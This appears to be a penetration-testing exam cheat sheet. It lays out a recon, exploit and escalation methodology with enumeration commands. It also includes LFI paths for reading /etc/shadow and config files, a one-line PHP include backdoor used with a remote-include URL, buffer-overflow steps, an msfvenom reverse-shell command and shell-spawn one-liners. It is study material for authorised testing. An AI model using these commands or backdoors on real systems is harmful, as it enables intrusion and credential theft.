- Recon
- Find vuln
- Exploit
- Escalate
- Document it
Set a timer for 1hr, repeating. Each time it goes off, stop and evaluate your progress. If you haven't made any progress for 2 hours, move on to the next machine.
This is important. Getting stuck due to tunnel vision is extremely common during the exam. This isn't the labs - you don't have time to waste diving down rabbit holes.
Reverse lookup of entire provided range:
dig.sh <ips.txt>
for ip in $(cat ips.txt); do nslookup $ip <nameserver>; done
Run dark_enum.py (unicornscan of full port range)
- Actually read the intensive nmap scan
- Actually read Nikto/Dirb/nmap NSE script output
- Run the port scan again if you think something might have been missed
This is the essential part of penetration. Find out what is available and how you could punch through it with minimum ease.
DO NOT SKIP STEPS.
DO NOT PASS GO.
SEARCH ALL THE VERSIONS WITH searchsploit
(or google -> site:exploit-db.com APP VERSION
)
curl -i ${IP}/robots.txt
Note down Server and other module versions.
searchsploit them ALL.
Visit all URLs from robots.txt.
nikto -host $IP
gobuster -u http://$IP -w /usr/share/seclists/Discovery/Web_Content/Top1000-RobotsDisallowed.txt
gobuster -u http://$IP -w /usr/share/seclists/Discovery/Web_Content/common.txt
if nothing, find more web word lists.
Browse the site but keep an eye on the burp window / source code / cookies etc.
Things to be on look for:
- Default credentials for software
- SQL-injectable GET/POST params
- LFI/RFI through ?page=foo type params
- LFI:
/etc/passwd
|/etc/shadow
insta-win/var/www/html/config.php
or similar paths to get SQL etc creds?page=php://filter/convert.base64-encode/resource=../config.php
../../../../../boot.ini
to find out windows version
- RFI:
- Have your PHP/cgi downloader ready
<?php include $_GET['inc']; ?>
simplest backdoor to keep it dynamic without anything messing your output- Then you can just
http://$IP/inc.php?inc=http://$YOURIP/bg.php
and have full control with minimal footprint on target machine - get
phpinfo()
Heartbleed / CRIME / Other similar attacks
Read the actual SSL CERT to:
- find out potential correct vhost to GET
- is the clock skewed
- any names that could be usernames for bruteforce/guessing.
- Anonymous login
- Enumerate the hell out of the machine!
- OS version
- Other software you can find on the machine (Prog Files, yum.log, /bin)
- password files
- DLLs for
msfpescan
/ BOF targets
- Do you have UPLOAD potential?
- Can you trigger execution of uploads?
- Swap binaries?
- Vulnerabilities in version / RCE / #WINNING?-D
enum4linux -a $IP
Read through the report and search for versions of things => searchsploit
smbclient -L $IP
Mount shares
mount -t cifs -o user=USERNAME,sec=ntlm,dir_mode=0077 "//10.10.10.10/My Share" /mnt/cifs
Can you access shares?
- Directly exploitable MSxx-xxx versions?
- Worth burning MSF strike?
- Try to enumerate windows shares / network info
Quick test of communities:
onesixtyone
Full discovery of everything you can:
snmp-check
- Read / Write access?
- Pretty much same things as FTP
Unless you get a MOTD or a broken sshd version, you are SOOL and this is likely just a secondary access point once you break something else.
SMTP, POP3(s) and IMAP(s) are good for enumerating users.
Also: CHECK VERSIONS and searchsploit
- Determine length of overflow trigger w/ binary search "A"x1000
- Determine exact EIP with
pattern_create.rb
&pattern_offset.rb
- Determine badchars to make sure all of your payload is getting through
- Develop exploit
- Is the payload right at ESP
JMP ESP
- Is the payload before ESP
sub ESP, 200
and thenJMP ESP
- or
call [ESP-200]
msfvenom -a x86 --platform windows/linux -p something/shell/reverse_tcp lhost=x.x.x.x lport=53 -f exe/elf/python/perl/php -o filename
- Make sure it fits your payload length above
- Gain shell, local priv esc or rooted already?
- python -c 'import pty; pty.spawn("/bin/sh")'
- echo os.system('/bin/bash')
- /bin/sh -i
- perl —e 'exec "/bin/sh";'
Also see: http://netsec.ws/?p=337
- Check current access first:
- Am I in sudoers?
- Do I have sudoedit access to useful files?
- Enumerate!
Good resources:
- http://netsec.ws/?p=309
- https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
- https://github.com/mubix/post-exploitation/wiki/Linux-Post-Exploitation-Command-List
- https://www.rebootuser.com/?p=1623
- https://www.kernel-exploits.com/
- http://security.stackexchange.com/questions/101715/automatically-enumerate-missing-patches-on-penetration-test
If still stuck, try Dirty COW: https://github.com/dirtycow/dirtycow.github.io/wiki
- Check current access first:
- Am I already Administrator?
- Am I in Remote Desktop Users?
- Enumerate!
Good resources:
- http://www.fuzzysecurity.com/tutorials/16.html
- http://it-ovid.blogspot.com.au/2012/02/windows-privilege-escalation.html?m=1
- http://www.greyhathacker.net/?p=738
- https://www.youtube.com/watch?v=kMG8IsCohHA
- https://www.youtube.com/watch?v=PC_iMqiuIRQ
cewl
for crawling a site for bruteforcing user/password- don't forget about
nmap
scripts!- e.g.
--script smtp-commands
or--script auth-owners
- e.g.